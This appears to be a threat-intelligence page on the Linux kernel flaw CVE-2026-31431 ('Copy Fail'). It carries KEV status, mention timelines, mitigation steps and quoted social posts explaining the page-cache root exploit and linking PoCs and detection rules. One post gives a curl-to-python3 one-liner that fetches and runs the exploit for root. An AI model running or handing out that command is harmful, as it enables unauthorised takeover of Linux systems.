CVE-2026-31431General(amazon / amazon_linux)

CRITICALCVSS 7.8 · HIGHCISA KEV

Exploitation observed; activity peaked at 475 mentions and remains active

Immediate actions

  • Patch amazon amazon_linux systems immediately
  • Assume compromise if assets are exposed
  • Hunt for exploitation attempts and persistence artifacts
  • Increase monitoring for publicly documented tradecraft

Recommended action window: Immediate (within 24h)

NVD description

In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

10.0/ 10 priority

Sources & remediation

Listed in the CISA Known Exploited Vulnerabilities catalog. Federal remediation due date: 2026-05-15. "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Weakness type (CWE)
CWE-669CWE-1288

Priority

CRITICAL

Exploitation

ACTIVE

PoC

YES

Patch

AVAILABLE

Momentum

DECLINING

Are you affected?

If you run products in this scope, you should treat this CVE as relevant to your environment.

  • amazon_linux
  • basesystem_module
  • caas_platform
  • cloudvision_agni

Threat summary

  • Active exploitation appears in 242 classified signals
  • Public PoC and exploit tooling are both present
  • Patch or workaround signal is available
  • 1,752 mentions across 91 observed days

What's happening

  • Active exploitation reported across 242 signals
  • Exploit tool or code specified in 280 signals
  • PoC mentioned or linked in 472 signals
  • Patch or workaround mentioned in 607 signals
  • Technical details provided in 877 signals
  • General: 476 classified signals
  • Disclosure: 304 classified signals
  • Peaked 87d ago at 475 mentions (2026-04-30); latest day: 1
  • 1,752 total mentions across 91 days

Affected systems

Products
amazon_linuxbasesystem_modulecaas_platformcloudvision_agnicloudvision_portaldebian_linuxdevelopment_tools_moduleenterprise_linuxenterprise_linux_ausenterprise_linux_eus

47 versions affected across 60 products

Deep dive

Activity timeline1,752 mentions / 91d
0119238356475Mentions · 2026-04-22: 3Mentions · 2026-04-23: 1Mentions · 2026-04-29: 55Mentions · 2026-04-30: 475Mentions · 2026-05-01: 246Mentions · 2026-05-02: 121Mentions · 2026-05-03: 124Mentions · 2026-05-04: 123Mentions · 2026-05-05: 94Mentions · 2026-05-06: 60Mentions · 2026-05-07: 36Mentions · 2026-05-08: 44Mentions · 2026-05-09: 39Mentions · 2026-05-10: 20Mentions · 2026-05-11: 30Mentions · 2026-05-12: 19Mentions · 2026-05-13: 13Mentions · 2026-05-14: 12Mentions · 2026-05-15: 7Mentions · 2026-05-16: 9Mentions · 2026-05-17: 1Mentions · 2026-05-18: 9Mentions · 2026-05-19: 5Mentions · 2026-05-20: 8Mentions · 2026-05-21: 5Mentions · 2026-05-22: 9Mentions · 2026-05-23: 4Mentions · 2026-05-25: 1Mentions · 2026-05-26: 5Mentions · 2026-05-27: 6Mentions · 2026-05-28: 5Mentions · 2026-05-29: 24Mentions · 2026-05-30: 4Mentions · 2026-05-31: 7Mentions · 2026-06-01: 7Mentions · 2026-06-02: 1Mentions · 2026-06-03: 7Mentions · 2026-06-04: 4Mentions · 2026-06-05: 2Mentions · 2026-06-08: 6Mentions · 2026-06-09: 2Mentions · 2026-06-10: 1Mentions · 2026-06-11: 1Mentions · 2026-06-14: 4Mentions · 2026-06-15: 14Mentions · 2026-06-16: 1Mentions · 2026-06-17: 2Mentions · 2026-06-20: 4Mentions · 2026-06-22: 4Mentions · 2026-06-24: 1Mentions · 2026-06-25: 6Mentions · 2026-06-26: 1Mentions · 2026-06-27: 3Mentions · 2026-06-28: 2Mentions · 2026-06-30: 1Mentions · 2026-07-02: 1Mentions · 2026-07-04: 1Mentions · 2026-07-07: 3Mentions · 2026-07-09: 2Mentions · 2026-07-12: 1Mentions · 2026-07-13: 1Mentions · 2026-07-14: 2Mentions · 2026-07-15: 2Mentions · 2026-07-19: 3Mentions · 2026-07-20: 1Mentions · 2026-07-21: 2Mentions · 2026-08-03: 1Mentions · 2026-08-06: 2Mentions · 2026-08-11: 1Mentions · 2026-08-13: 1Mentions · 2026-08-16: 1Mentions · 2026-08-17: 1Mentions · 2026-08-19: 3Mentions · 2026-08-20: 3Mentions · 2026-08-21: 3Mentions · 2026-08-25: 1Mentions · 2026-08-26: 1Mentions · 2026-08-28: 1Mentions · 2026-08-29: 1Mentions · 2026-09-06: 1Mentions · 2026-09-09: 2Mentions · 2026-09-10: 1Mentions · 2026-09-11: 1Mentions · 2026-09-13: 1Mentions · 2026-09-14: 1Mentions · 2026-09-15: 1Mentions · 2026-09-18: 2Mentions · 2026-09-22: 1Mentions · 2026-09-23: 1Mentions · 2026-10-01: 2Mentions · 2026-10-06: 1PoC Mentioned / Linked · 2026-04-29: 28PoC Mentioned / Linked · 2026-04-30: 176PoC Mentioned / Linked · 2026-05-01: 59PoC Mentioned / Linked · 2026-05-02: 30PoC Mentioned / Linked · 2026-05-03: 12PoC Mentioned / Linked · 2026-05-04: 23PoC Mentioned / Linked · 2026-05-05: 16PoC Mentioned / Linked · 2026-05-06: 18PoC Mentioned / Linked · 2026-05-07: 11PoC Mentioned / Linked · 2026-05-08: 13PoC Mentioned / Linked · 2026-05-09: 8PoC Mentioned / Linked · 2026-05-10: 5PoC Mentioned / Linked · 2026-05-11: 11PoC Mentioned / Linked · 2026-05-12: 5PoC Mentioned / Linked · 2026-05-13: 4PoC Mentioned / Linked · 2026-05-14: 1PoC Mentioned / Linked · 2026-05-15: 1PoC Mentioned / Linked · 2026-05-16: 1PoC Mentioned / Linked · 2026-05-17: 1PoC Mentioned / Linked · 2026-05-18: 2PoC Mentioned / Linked · 2026-05-19: 2PoC Mentioned / Linked · 2026-05-21: 1PoC Mentioned / Linked · 2026-05-22: 1PoC Mentioned / Linked · 2026-05-23: 3PoC Mentioned / Linked · 2026-05-26: 1PoC Mentioned / Linked · 2026-05-28: 2PoC Mentioned / Linked · 2026-05-29: 5PoC Mentioned / Linked · 2026-05-30: 1PoC Mentioned / Linked · 2026-05-31: 2PoC Mentioned / Linked · 2026-06-01: 1PoC Mentioned / Linked · 2026-06-03: 1PoC Mentioned / Linked · 2026-06-04: 2PoC Mentioned / Linked · 2026-06-08: 2PoC Mentioned / Linked · 2026-06-10: 1PoC Mentioned / Linked · 2026-06-14: 1PoC Mentioned / Linked · 2026-06-15: 1PoC Mentioned / Linked · 2026-06-16: 1PoC Mentioned / Linked · 2026-06-25: 2PoC Mentioned / Linked · 2026-06-26: 1PoC Mentioned / Linked · 2026-06-27: 2PoC Mentioned / Linked · 2026-06-28: 2PoC Mentioned / Linked · 2026-07-02: 1PoC Mentioned / Linked · 2026-07-12: 1PoC Mentioned / Linked · 2026-07-14: 1PoC Mentioned / Linked · 2026-07-15: 1PoC Mentioned / Linked · 2026-07-19: 1PoC Mentioned / Linked · 2026-08-03: 1PoC Mentioned / Linked · 2026-08-06: 1PoC Mentioned / Linked · 2026-08-13: 1PoC Mentioned / Linked · 2026-08-16: 1PoC Mentioned / Linked · 2026-08-28: 1PoC Mentioned / Linked · 2026-09-10: 1PoC Mentioned / Linked · 2026-09-11: 1Exploit Tool / Code · 2026-04-29: 17Exploit Tool / Code · 2026-04-30: 104Exploit Tool / Code · 2026-05-01: 33Exploit Tool / Code · 2026-05-02: 18Exploit Tool / Code · 2026-05-03: 6Exploit Tool / Code · 2026-05-04: 10Exploit Tool / Code · 2026-05-05: 9Exploit Tool / Code · 2026-05-06: 11Exploit Tool / Code · 2026-05-07: 8Exploit Tool / Code · 2026-05-08: 7Exploit Tool / Code · 2026-05-09: 5Exploit Tool / Code · 2026-05-10: 3Exploit Tool / Code · 2026-05-11: 8Exploit Tool / Code · 2026-05-12: 3Exploit Tool / Code · 2026-05-13: 3Exploit Tool / Code · 2026-05-15: 1Exploit Tool / Code · 2026-05-16: 1Exploit Tool / Code · 2026-05-18: 1Exploit Tool / Code · 2026-05-21: 1Exploit Tool / Code · 2026-05-23: 2Exploit Tool / Code · 2026-05-28: 1Exploit Tool / Code · 2026-05-29: 5Exploit Tool / Code · 2026-05-30: 1Exploit Tool / Code · 2026-05-31: 1Exploit Tool / Code · 2026-06-03: 1Exploit Tool / Code · 2026-06-04: 2Exploit Tool / Code · 2026-06-08: 2Exploit Tool / Code · 2026-06-10: 1Exploit Tool / Code · 2026-06-14: 1Exploit Tool / Code · 2026-06-25: 2Exploit Tool / Code · 2026-06-26: 1Exploit Tool / Code · 2026-06-27: 2Exploit Tool / Code · 2026-06-28: 1Exploit Tool / Code · 2026-07-12: 1Exploit Tool / Code · 2026-07-14: 1Exploit Tool / Code · 2026-07-15: 1Exploit Tool / Code · 2026-07-19: 1Exploit Tool / Code · 2026-08-03: 1Exploit Tool / Code · 2026-08-21: 1Exploit Tool / Code · 2026-08-28: 1Exploit Tool / Code · 2026-09-10: 1Active Exploitation · 2026-04-29: 3Active Exploitation · 2026-04-30: 9Active Exploitation · 2026-05-01: 10Active Exploitation · 2026-05-02: 11Active Exploitation · 2026-05-03: 48Active Exploitation · 2026-05-04: 38Active Exploitation · 2026-05-05: 22Active Exploitation · 2026-05-06: 22Active Exploitation · 2026-05-07: 7Active Exploitation · 2026-05-08: 6Active Exploitation · 2026-05-09: 6Active Exploitation · 2026-05-10: 5Active Exploitation · 2026-05-11: 8Active Exploitation · 2026-05-12: 3Active Exploitation · 2026-05-13: 1Active Exploitation · 2026-05-14: 2Active Exploitation · 2026-05-15: 2Active Exploitation · 2026-05-16: 1Active Exploitation · 2026-05-19: 1Active Exploitation · 2026-05-22: 2Active Exploitation · 2026-05-27: 1Active Exploitation · 2026-05-29: 2Active Exploitation · 2026-05-31: 5Active Exploitation · 2026-06-01: 2Active Exploitation · 2026-06-02: 1Active Exploitation · 2026-06-03: 5Active Exploitation · 2026-06-04: 1Active Exploitation · 2026-06-05: 2Active Exploitation · 2026-06-08: 2Active Exploitation · 2026-06-09: 1Active Exploitation · 2026-06-15: 3Active Exploitation · 2026-06-20: 1Active Exploitation · 2026-06-22: 2Active Exploitation · 2026-07-14: 1Active Exploitation · 2026-08-06: 1Active Exploitation · 2026-08-20: 1Active Exploitation · 2026-08-26: 1Active Exploitation · 2026-09-14: 1Active Exploitation · 2026-09-22: 1Active Exploitation · 2026-09-23: 1Patch / Workaround · 2026-04-22: 1Patch / Workaround · 2026-04-29: 17Patch / Workaround · 2026-04-30: 167Patch / Workaround · 2026-05-01: 86Patch / Workaround · 2026-05-02: 50Patch / Workaround · 2026-05-03: 37Patch / Workaround · 2026-05-04: 53Patch / Workaround · 2026-05-05: 38Patch / Workaround · 2026-05-06: 21Patch / Workaround · 2026-05-07: 19Patch / Workaround · 2026-05-08: 16Patch / Workaround · 2026-05-09: 11Patch / Workaround · 2026-05-10: 6Patch / Workaround · 2026-05-11: 9Patch / Workaround · 2026-05-12: 6Patch / Workaround · 2026-05-13: 7Patch / Workaround · 2026-05-14: 3Patch / Workaround · 2026-05-15: 3Patch / Workaround · 2026-05-16: 4Patch / Workaround · 2026-05-17: 1Patch / Workaround · 2026-05-19: 3Patch / Workaround · 2026-05-21: 2Patch / Workaround · 2026-05-22: 3Patch / Workaround · 2026-05-23: 3Patch / Workaround · 2026-05-26: 1Patch / Workaround · 2026-05-27: 5Patch / Workaround · 2026-05-28: 1Patch / Workaround · 2026-05-29: 4Patch / Workaround · 2026-05-31: 1Patch / Workaround · 2026-06-01: 2Patch / Workaround · 2026-06-03: 3Patch / Workaround · 2026-06-04: 1Patch / Workaround · 2026-06-08: 2Patch / Workaround · 2026-06-09: 1Patch / Workaround · 2026-06-10: 1Patch / Workaround · 2026-06-14: 2Patch / Workaround · 2026-06-17: 1Patch / Workaround · 2026-06-20: 2Patch / Workaround · 2026-06-26: 1Patch / Workaround · 2026-06-27: 2Patch / Workaround · 2026-07-02: 1Patch / Workaround · 2026-07-14: 1Patch / Workaround · 2026-07-15: 1Patch / Workaround · 2026-07-19: 1Patch / Workaround · 2026-07-20: 1Patch / Workaround · 2026-07-21: 1Patch / Workaround · 2026-08-20: 1Patch / Workaround · 2026-09-09: 1Patch / Workaround · 2026-09-10: 1Patch / Workaround · 2026-09-15: 1Patch / Workaround · 2026-09-18: 1Technical Details · 2026-04-22: 1Technical Details · 2026-04-29: 29Technical Details · 2026-04-30: 227Technical Details · 2026-05-01: 111Technical Details · 2026-05-02: 64Technical Details · 2026-05-03: 44Technical Details · 2026-05-04: 62Technical Details · 2026-05-05: 49Technical Details · 2026-05-06: 33Technical Details · 2026-05-07: 21Technical Details · 2026-05-08: 26Technical Details · 2026-05-09: 19Technical Details · 2026-05-10: 11Technical Details · 2026-05-11: 20Technical Details · 2026-05-12: 9Technical Details · 2026-05-13: 8Technical Details · 2026-05-14: 4Technical Details · 2026-05-15: 5Technical Details · 2026-05-16: 4Technical Details · 2026-05-18: 5Technical Details · 2026-05-19: 4Technical Details · 2026-05-20: 3Technical Details · 2026-05-21: 2Technical Details · 2026-05-22: 5Technical Details · 2026-05-23: 3Technical Details · 2026-05-25: 1Technical Details · 2026-05-26: 2Technical Details · 2026-05-27: 2Technical Details · 2026-05-28: 4Technical Details · 2026-05-29: 15Technical Details · 2026-05-30: 4Technical Details · 2026-05-31: 4Technical Details · 2026-06-01: 1Technical Details · 2026-06-03: 5Technical Details · 2026-06-04: 3Technical Details · 2026-06-05: 1Technical Details · 2026-06-08: 6Technical Details · 2026-06-09: 1Technical Details · 2026-06-14: 2Technical Details · 2026-06-15: 11Technical Details · 2026-06-17: 2Technical Details · 2026-06-20: 1Technical Details · 2026-06-22: 4Technical Details · 2026-06-24: 1Technical Details · 2026-06-25: 5Technical Details · 2026-06-26: 1Technical Details · 2026-06-27: 2Technical Details · 2026-06-28: 1Technical Details · 2026-06-30: 1Technical Details · 2026-07-02: 1Technical Details · 2026-07-07: 1Technical Details · 2026-07-09: 1Technical Details · 2026-07-12: 1Technical Details · 2026-07-14: 1Technical Details · 2026-07-15: 2Technical Details · 2026-07-19: 2Technical Details · 2026-08-03: 1Technical Details · 2026-08-11: 1Technical Details · 2026-08-13: 1Technical Details · 2026-08-16: 1Technical Details · 2026-08-17: 1Technical Details · 2026-08-19: 2Technical Details · 2026-08-20: 2Technical Details · 2026-08-21: 1Technical Details · 2026-08-26: 1Technical Details · 2026-08-28: 1Technical Details · 2026-09-10: 1Technical Details · 2026-09-11: 1Technical Details · 2026-09-13: 1Technical Details · 2026-09-14: 1Technical Details · 2026-09-18: 1Technical Details · 2026-09-22: 1Technical Details · 2026-09-23: 104-2205-0605-1505-2506-0306-1606-3007-1908-1909-1010-06
Signal classification7 categories
General
47627.2%
Patch
40022.9%
Disclosure
30417.4%
Active Exploitation
22312.8%
PoC
22212.7%
Exploit
1136.5%
Referenced assets710 URLs
By indicator
Classification over time
DateTotalLabels
2026-04-223
Disclosure1General1Patch1
2026-04-231
General1
2026-04-2955
Active Exploitation2Disclosure9Exploit8False Positive1General13Patch11PoC11
2026-04-30475
Active Exploitation6Disclosure73Exploit36False Positive4General144Patch113PoC99
2026-05-01246
Active Exploitation8Disclosure37Exploit16False Positive3General83Patch68PoC31
2026-05-02121
Active Exploitation9Disclosure25Exploit12General31Patch33PoC11
2026-05-03124
Active Exploitation48Disclosure17Exploit4False Positive1General26Patch22PoC6
2026-05-04123
Active Exploitation34Disclosure19Exploit4False Positive1General31Patch30PoC4
2026-05-0594
Active Exploitation21Disclosure24Exploit2General19Patch22PoC6
2026-05-0660
Active Exploitation21Disclosure9Exploit2General13Patch6PoC9
2026-05-0736
Active Exploitation5Disclosure4Exploit5General6Patch13PoC3
2026-05-0844
Active Exploitation5Disclosure11Exploit2General10Patch12PoC4
2026-05-0939
Active Exploitation5Disclosure8Exploit3False Positive1General11Patch7PoC4
2026-05-1020
Active Exploitation5Disclosure2General7Patch4PoC2
2026-05-1130
Active Exploitation8Disclosure8Exploit1General3Patch4PoC6
2026-05-1219
Active Exploitation3Disclosure4Exploit2General4Patch5PoC1
2026-05-1313
Active Exploitation1Disclosure1General3Patch6PoC2
2026-05-1412
Active Exploitation2General7Patch2PoC1
2026-05-157
Active Exploitation2Disclosure1General2Patch2
2026-05-169
Active Exploitation1Disclosure2General3Patch2PoC1
2026-05-171
PoC1
2026-05-189
Disclosure3General5PoC1
2026-05-195
Disclosure1Patch3PoC1
2026-05-208
Disclosure4General4
2026-05-215
Disclosure1Exploit1General1Patch2
2026-05-229
Active Exploitation2General5Patch2
2026-05-234
Exploit2Patch1PoC1
2026-05-251
Disclosure1
2026-05-265
Disclosure2General2Patch1
2026-05-276
Active Exploitation1Patch5
2026-05-285
Disclosure1Exploit2General1Patch1
2026-05-2924
Active Exploitation2Disclosure8Exploit3General6Patch3PoC2
2026-05-304
Disclosure1General1Patch1PoC1
2026-05-317
Active Exploitation5Exploit1General1
2026-06-017
Active Exploitation2Disclosure1General2Patch2
2026-06-021
Active Exploitation1
2026-06-037
Active Exploitation5Disclosure1Patch1
2026-06-044
Active Exploitation1Disclosure1Exploit1Patch1
2026-06-052
Active Exploitation2
2026-06-086
Active Exploitation2Disclosure2Exploit1General1
2026-06-092
Active Exploitation1Patch1
2026-06-101
Exploit1
2026-06-111
General1
2026-06-144
General1Patch2PoC1
2026-06-1514
Active Exploitation3Disclosure5General5PoC1
2026-06-161
PoC1
2026-06-172
Disclosure1Patch1
2026-06-204
Active Exploitation1Disclosure1Patch2
2026-06-224
Active Exploitation2Disclosure2
2026-06-241
Disclosure1
2026-06-256
Disclosure4General1PoC1
2026-06-261
PoC1
2026-06-273
Exploit1General1PoC1
2026-06-282
PoC2
2026-06-301
Disclosure1
2026-07-021
Patch1
2026-07-041
Disclosure1
2026-07-073
General3
2026-07-092
Disclosure2
2026-07-121
PoC1
2026-07-131
General1
2026-07-142
Active Exploitation1Exploit1
2026-07-152
Exploit1Patch1
2026-07-193
Disclosure1Patch1PoC1
2026-07-201
Patch1
2026-07-212
General1Patch1
2026-08-031
Exploit1
2026-08-062
Active Exploitation1General1
2026-08-111
General1
2026-08-131
PoC1
2026-08-161
General1
2026-08-171
General1
2026-08-193
General3
2026-08-203
Active Exploitation1Disclosure1General1
2026-08-213
Disclosure1General2
2026-08-251
General1
2026-08-261
Active Exploitation1
2026-08-281
PoC1
2026-08-291
General1
2026-09-061
General1
2026-09-092
General1Patch1
2026-09-101
PoC1
2026-09-111
PoC1
2026-09-131
Disclosure1
2026-09-141
Active Exploitation1
2026-09-151
Patch1
2026-09-182
General1Patch1
2026-09-221
Active Exploitation1
2026-09-231
Active Exploitation1
Full discourse20 posts
  • International Cyber Digest@IntCyberDigest
    Disclosure

    ‼️🚨 BREAKING: An AI found a Linux kernel zero-day that roots every distribution since 2017. The exploit fits in 732 bytes of Python. Patch your kernel ASAP. The vulnerability is CVE-2026-31431, nicknamed "Copy Fail," disclosed today by Theori. It has been sitting quietly in the Linux kernel for nine years. Most Linux privilege-escalation bugs are picky. They need a precise timing window (a "race"), or specific kernel addresses leaked from somewhere, or careful tuning per distribution. Copy Fail needs none of that. It is a straight-line logic mistake that works on the first try, every time, on every mainstream Linux box. The attacker just needs a normal user account on the machine. From there, the script asks the kernel to do some encryption work, abuses how that work is wired up, and ends up writing 4 bytes into a memory area called the "page cache" (Linux's high-speed copy of files in RAM). Those 4 bytes can be aimed at any program the system trusts, like /usr/bin/su, the shortcut to becoming root. Result: the next time anyone runs that program, it lets the attacker in as root. What should worry most: the corruption never touches the file on disk. It only exists in Linux's in-memory copy of that file. If you imaged the hard drive afterwards, the on-disk file would match the official package hash exactly. Reboot the machine, or just put it under memory pressure (any normal system load that needs the RAM), and the cached copy reloads fresh from disk. Containers do not help either. The page cache is shared across the whole host, so a process inside a container can use this bug to compromise the underlying server and reach into other tenants. The original sin was a 2017 "in-place optimization" in a kernel crypto module called algif_aead. It was meant to make encryption slightly faster. The change broke a critical safety assumption, and nobody noticed for nine years. That bug then rode every kernel update from 2017 to today. This vulnerability affects the following: 🔴 Shared servers (dev boxes, jump hosts, build servers): any user becomes root 🔴 Kubernetes and container clusters: one compromised pod escapes to the host 🔴 CI runners (GitHub Actions, GitLab, Jenkins): a malicious pull request becomes root on the runner 🔴 Cloud platforms running user code (notebooks, agent sandboxes, serverless functions): a tenant becomes host root Timeline: 🔴 March 23, 2026: reported to the Linux kernel security team 🔴 April 1: patch committed to mainline (commit a664bf3d603d) 🔴 April 22: CVE assigned 🔴 April 29: public disclosure Mitigation: update your kernel to a build that includes mainline commit a664bf3d603d. If you cannot patch immediately, turn off the vulnerable module: echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true For environments that run untrusted code (containers, sandboxes, CI runners), block access to the kernel's AF_ALG crypto interface entirely, even after patching. Almost nothing legitimate needs it, and blocking it shuts the door on this whole class of bug...

    Post summary

    A newly discovered Linux kernel zero‑day (CVE‑2026‑31431) is disclosed with a 732‑byte Python PoC, detailed exploitation mechanism, and an available patch commit.

    2292.7K42711.5K7.0K2.4M
    184.6K followersView on X
  • Dark Web Informer@DarkWebInformer
    Exploit

    ‼️Copy Fail (CVE-2026-31431) is a Linux privilege escalation bug that lets any local user get root using a 732-byte Python script, and itworks on basically every major Linux distro shipped since 2017. Website: https://copy.fail/ Write-up: https://xint.io/blog/copy-fail-linux-distributions GitHub: https://github.com/theori-io/copy-fail-CVE-2026-31431 It's a logic flaw in the kernel's crypto code (authencesn via AF_ALG and splice()) that allows a small write into the page cache, which can be used to tamper with a setuid binary like /usr/bin/su. Think how bad this is going to be for shared environments like Kubernetes, CI runners, and cloud sandboxes, where it enables container escape and tenant-to-host compromise. Found by Theori's Xint Code scanner, patched in the mainline kernel, and publicly disclosed on April 29, 2026; if you can't patch right away, the recommended workaround is to disable the algif_aead module.

    Post summary

    The post announces the discovery of CVE-2026-31431, provides a PoC and exploit code, details the kernel flaw, and offers patches and a workaround, but does not report active wild exploitation.

    62821913.3K1.9K443.8K
    222.6K followersView on X
  • SOU⚡️投資ニュース / 仮想通貨・米国株・AI@SOU_BTC
    Patch

    【速報】🚨 Linuxに9年潜伏の最悪バグ、誰でもroot奪取可能 ・AIが重大ゼロデイ(CVE-2026-31431)を発見 ・通常ユーザー→root権限を即取得(ほぼ全環境で成功) ・痕跡はメモリのみ、ディスクには残らない ・コンテナでも防げず、ホストごと侵害 対策:カーネルを即アップデート https://t.co/u3lyQwfxgz

    Post summary

    The tweet details a kernel‑level privilege‑escalation CVE (CVE‑2026‑31431) that allows any user to gain root with only memory traces, and strongly recommends immediate kernel updates.

    219111823.2K1.3K921.0K
    156.6K followersView on X
  • vx-underground@vxunderground
    PoC

    CVE-2026-31431 a/k/a CopyFail > Linux LPE > Description sounds like AI slop > Exploit is legit > Impacts every Linux kernel from 2017 - Now > Proof-of-concept released > It's Wednesday? https://copy.fail/

    Post summary

    CVE-2026-31431 is a Linux local privilege escalation affecting kernels from 2017 onward; a proof‑of‑concept was released and the exploit is considered legitimate, as per the posted link.

    100528743.6K946261.2K
    441.7K followersView on X
  • Brian Pak@brian_pak
    PoC

    Time to talk about this one. CopyFail (CVE-2026-31431) — a 732-byte Python script that roots every Linux distro shipped since 2017. 🧵

    Post summary

    The tweet announces CVE-2026-31431, referencing a 732‑byte Python proof‑of‑concept that achieves root on all Linux distributions produced since 2017.

    42460792.8K1.5K744.4K
    3.6K followersView on X
  • まこ@tex2e
    General

    LinuxのCopy Fail脆弱性 (CVE-2026-31431) について、AIが1時間で見つけたという結果より、AIに「splice、ページキャッシュ、scatterlistを追え」とプロンプトで指示したTaeyang Lee氏の着眼点がすごいと思う。 長年の経験と嗅覚から立てた初期仮説があってこそのAI利活用を体現されている

    Post summary

    The text praises an AI-assisted discovery of a Linux Copy Fail vulnerability (CVE-2026-31431), without mentioning a PoC, exploitation, patch, or false-positive, and only notes the vulnerability type.

    2316111.4K400109.2K
    1.6K followersView on X
  • Pirat_Nation 🔴@Pirat_Nation
    Exploit

    A newly discovered security vulnerability known as Copy Fail, or CVE-2026-31431, has been disclosed in the Linux kernel. It affects virtually every major Linux distribution released since 2017. The flaw sits in the kernel’s cryptographic subsystem and stems from a logic error introduced back in 2017: >It allows any local user without special privileges to escalate directly to root. >The exploit is unusually simple: a short Python script can reliably achieve this by modifying data only in the system’s memory cache rather than on disk. >In practice, an attacker can target any readable file, such as a setuid-root binary like sudo or su, and alter it only in RAM. >The change is invisible to file integrity monitors and leaves no trace on the hard drive. >The same technique also works from inside containers, potentially allowing an escape from Docker, Kubernetes, or similar environments to compromise the host server. >This makes Copy Fail both stealthy and highly portable across systems. Patches have already begun rolling out from major distributors. System administrators should apply the latest kernel updates and reboot as soon as possible.

    Post summary

    CVE‑2026‑31431 is a kernel cryptographic flaw that allows local users to gain root through a simple Python script. Patches are actively being distributed, and administrators are urged to update promptly.

    2514471.7K25478.0K
    336.1K followersView on X
  • Bad Sector Labs@badsectorlabs
    Exploit

    CopyFail (CVE-2026-31431) in Go. In case you want to get root from a static binary without Python as a dependency. https://github.com/badsectorlabs/copyfail-go https://t.co/yxgLXGtr33

    Post summary

    A GitHub repo hosts a static binary exploit for CVE‑2026‑31431 that can elevate privileges to root on Go binaries, with no indication of active exploitation or vendor patches.

    16223151.1K54178.3K
    8.6K followersView on X
  • hsn今天吃什么@hsn8086k
    General

    2026 Linux 重置密码教程大全 - Dirty Cow (CVE-2016-5195) - Dirty Pipe (CVE-2022-0847) - io_uring UAF (CVE-2022-2602) - Copy Fail (CVE-2026-31431) - io_uring ZCRX freelist (CVE-2026-43121) - Dirty Frag (CVE-2026-43284 CVE-2026-43500) - Fragnesia (CVE-2026-46300)

    Post summary

    The content enumerates several Linux kernel CVEs but offers no proof‑of‑concepts, exploit details, patches, or technical depth.

    17193111.1K50579.9K
    2.3K followersView on X
  • Pablo Fredrikson@PeladoNerd
    Exploit

    Hablemos de CVE-2026-31431 o "Copy Fail" es una vulnerabilidad que afecta TODOS los kernels de Linux desde 2017 en adelante y permite ganar acceso root con una línea de código: https://t.co/Fv4aQUW3bp

    Post summary

    The message highlights CVE-2026-31431, a Linux kernel privilege‑escalation flaw that grants root via a single line of code, and links to a PoC snippet.

    1921516997497131.1K
    32.9K followersView on X
  • ZianTT@ZianTT_Official
    Exploit

    🔥还在担心忘记root密码吗,不要慌,一行命令就能帮你从低权限找回你的root权限🔥 curl https://copy.fail/exp | python3 && su CVE-2026-31431,影响2017至今的distro 与dirtycow不同的是,它无需race即可提权,利用范围比dirtypipe广,基本上是核弹级了 当然你也可以留着防止哪天忘了root密码(x

    Post summary

    The post demonstrates an exploit for CVE‑2026‑31431 via a direct command, providing a functional PoC and technical details, but offers no patch, workaround, or evidence of active exploitation.

    1812822719576151.5K
    2.0K followersView on X
  • yutkat@yutkat
    General

    いくらLinuxが若者人気がないからって、 通知が来てから2分以内に一般ユーザーからrootになるサービス「BeRoot」 を7年も前から実装してなくてもいいのよ・・・ Copy Fail (CVE-2026-31431)

    Post summary

    The text references CVE‑2026‑31431 but provides no additional technical, exploit, or mitigation information.

    218691.1K127119.9K
    3.0K followersView on X
  • hsn今天吃什么@hsn8086k
    General

    Linux 重置密码大全 - Dirty Cow (CVE-2016-5195) - Dirty Pipe (CVE-2022-0847) - io_uring UAF (CVE-2022-2602) - Copy Fail (CVE-2026-31431) - io_uring ZCRX freelist (CVE-2026-43121) - Dirty Frag (CVE-2026-43284 CVE-2026-43500) - Fragnesia (CVE-2026-46300) -PinTheft (CVE-2026-43494)

    Post summary

    The post enumerates several Linux CVEs associated with password reset, but it offers no technical detail, exploit code, evidence of active exploitation, or patch information.

    43118972036546.3K
    2.3K followersView on X
  • DragonJAR - Seguridad Informática@DragonJAR
    PoC

    🔥 Un fallo en Linux estuvo 9 años sin que nadie lo detectara. CVE-2026-31431 afecta Ubuntu, Debian, Fedora y más. Menos de 30 líneas de código para escalar a root desde cualquier usuario. https://t.co/VVlWdgm1VO

    Post summary

    The tweet announces CVE‑2026‑31431, a privilege‑escalation flaw affecting major Linux distributions, claiming it can be exploited with under 30 lines of code and providing a link that likely hosts the PoC.

    6149666531647.7K
    254.1K followersView on X
  • IPA (ICATalerts)@ICATalerts
    Patch

    Linuxの脆弱性対策について(CVE-2026-31431、Copy Fail) https://www.ipa.go.jp/security/security-alert/2026/alert20260501.html

    Post summary

    A Japanese security alert (IPA) announces a Linux vulnerability, CVE‑2026‑31431, with technical details and countermeasures such as patches or workarounds.

    22482159819097.2K
    35.5K followersView on X
  • zack0x01@zack0x01_
    Disclosure

    “CVE-2026-31431” just dropped… and it reportedly allows root access on pretty much any Linux version 😳 If that holds up, that’s absolutely wild. https://t.co/73d7ulv2qv

    Post summary

    A Twitter post announces the release of CVE‑2026‑31431, claiming it can grant root access on most Linux systems, with no evidence of exploitation or patches yet.

    11661062431458.3K
    3.1K followersView on X
  • Het Mehta@hetmehtaa
    General

    Them: Linux is most secure OS Me: Yes - Dirty Cow (CVE-2016-5195) - Dirty Pipe (CVE-2022-0847) - io_uring UAF (CVE-2022-2602) - Copy Fail (CVE-2026-31431) - io_uring ZCRX freelist (CVE-2026-43121) - Dirty Frag (CVE-2026-43284 CVE-2026-43500) - Fragnesia (CVE-2026-46300)

    Post summary

    The statement simply enumerates a list of Linux kernel CVE identifiers without providing supporting details, evidence of exploitation, or corrective information.

    566618598272159.8K
    42.2K followersView on X
  • Florian Roth ⚡️@cyb3rops
    PoC

    We released first detection rules for Copy Fail / CVE-2026-31431. YARA rules by me: https://github.com/Neo23x0/signature-base/blob/master/yara/expl_copy_fail_cve_2026_31431.yar It covers public PoC artifacts, including known payloads, exploit code fragments and URLs seen in shared material. More generic rules for customer environments are still in testing. Sigma rules by @_swachchhanda_: https://github.com/SigmaHQ/sigma/pull/5968 They cover suspicious Copy Fail-related exploitation patterns, including setuid binary execution behavior and NULL argv shell execution. More updates soon.

    Post summary

